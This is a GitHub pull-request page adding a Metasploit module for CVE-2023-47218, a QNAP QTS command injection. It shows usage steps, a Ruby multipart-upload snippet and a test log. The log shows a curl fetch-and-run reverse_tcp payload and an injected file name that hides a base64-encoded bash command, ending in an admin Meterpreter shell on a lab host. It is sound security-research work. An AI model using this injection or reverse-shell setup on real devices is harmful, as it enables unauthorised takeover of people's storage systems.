
Exploit module for CVE-2023-47218 in QNAP QTS and QuTH Hero #18832

Merged
merged 3 commits into from Feb 21, 2024

Conversation


@sfewer-r7 sfewer-r7 commented Feb 13, 2024

This pull request is for a module targeting CVE-2023-47218, an unauthenticated command injection vuln affecting QNAP QTS and QuTH Hero.

Our Rapid7 disclosure has an analysis of the vuln as well as a standalone PoC. During analysis I was emulating the firmware; instructions on how to do this are in the blog post.

Verification Steps

  1. Start msfconsole
  2. Do: use linux/http/qnap_qts_rce_cve_2023_47218
  3. Set the following options: RHOST, RPORT, LHOST and FETCH_SRVPORT if 8080 is already in use.
  4. Run the module
  5. Receive a Meterpreter session as the admin user.

end

data = Rex::MIME::Message.new
data.add_part(file_data, 'text/plain', 'binary', "form-data; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{Rex::Text.rand_text_alphanumeric(8)}\"; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{file_name}\"")

For context - when using Rex::MIME::Message, after adding all the parts to the object you have to call .to_s before sending it in your post request. The to_s function calls force_crlf on all the parts of the message if a transfer encoding is not set. So although the content of the request isn't binary (there might be a better transfer encoding value that can be used here), if we don't set it, the line feeds in the bootstrap script get forced to CRLFs and the payload fails to run.
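The CRLF behaviour described in this comment, as an added illustration that is not part of the PR or of Rex itself: a minimal stand-in (MiniMessage and MiniPart are assumed names, not Rex classes) that rewrites a part's body to CRLF only when no transfer encoding is set, plus a check that a constructed LF-terminated script survives to_s unchanged.

```ruby
# Added example (not from the Metasploit PR, and Rex is not loaded): a
# stand-in for the Rex::MIME::Message rule described in the review comment.
# MiniPart/MiniMessage are hypothetical names; the only behaviour mimicked is
# that to_s normalises a part's body to CRLF unless it has a transfer encoding.

# Mimics force_crlf: bare LF becomes CRLF, existing CRLF is left alone.
def force_crlf(str)
  str.gsub(/\r?\n/, "\r\n")
end

MiniPart = Struct.new(:content, :content_type, :transfer_encoding)

class MiniMessage
  def initialize
    @parts = []
    @boundary = '----ConstructedBoundary'
  end

  def add_part(content, content_type, transfer_encoding = nil)
    @parts << MiniPart.new(content, content_type, transfer_encoding)
  end

  # Bodies are rewritten only when no transfer encoding was given.
  def to_s
    body = +''
    @parts.each do |p|
      body << "--#{@boundary}\r\nContent-Type: #{p.content_type}\r\n"
      body << "Content-Transfer-Encoding: #{p.transfer_encoding}\r\n" if p.transfer_encoding
      body << "\r\n" << (p.transfer_encoding ? p.content : force_crlf(p.content)) << "\r\n"
    end
    body << "--#{@boundary}--\r\n"
  end
end

# Constructed sample: an LF-terminated POSIX shell script. With a CR glued to
# each line, sh would try to run "echo hello\r" and fail.
SCRIPT = "#!/bin/sh\necho hello\nexit 0\n"

# Extracts the script body as it leaves to_s so the line endings can be checked.
def part_body_after_to_s(transfer_encoding)
  msg = MiniMessage.new
  msg.add_part(SCRIPT, 'text/plain', transfer_encoding)
  msg.to_s.split("\r\n\r\n", 2).last.sub(/\r\n--.*\z/m, '')
end

# true only when the body came through byte-for-byte intact.
def script_intact?(transfer_encoding)
  part_body_after_to_s(transfer_encoding) == SCRIPT
end
```

Calling script_intact?('binary') returns true while script_intact?(nil) returns false, which is the same check a module author can run against a real Rex::MIME::Message before sending it.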

@jheysel-r7 jheysel-r7 marked this pull request as ready for review February 16, 2024 15:28
@bwatters-r7

@jheysel-r7 did you want to grab this; I think you were working with the target? If not, I'm happy to take it.

@jheysel-r7 jheysel-r7 self-assigned this Feb 21, 2024
@jheysel-r7

Thanks for the offer @bwatters-r7! I got this one. Also thank you for the great module @sfewer-r7 🙏

Testing was as expected, landing now:

msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > options

Module options (exploit/linux/http/qnap_qts_rce_cve_2023_47218):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.199.130   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      WIWafvHTsLd      no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8082             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /mnt/update      yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (3045380 bytes) to 172.16.199.130
[+] Deleted /mnt/update/KT8peOfE
[+] Deleted /mnt/update/"$($(echo -n YmFzaCAvbW50L3VwZGF0ZS9LVDhwZU9mRQ==|base64 -d))"
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:56302) at 2024-02-21 08:43:50 -0800

meterpreter > getuid
Server username: admin
meterpreter > sysinfo
Computer     : 172.16.199.130
OS           :  (Linux 6.5.0-17-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@jheysel-r7 jheysel-r7 merged commit 0aa20c7 into rapid7:master Feb 21, 2024
37 checks passed
@jheysel-r7

Release Notes

The PR adds a module targeting CVE-2023-47218, an unauthenticated command injection vulnerability affecting QNAP QTS and QuTH Hero devices.

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 21, 2024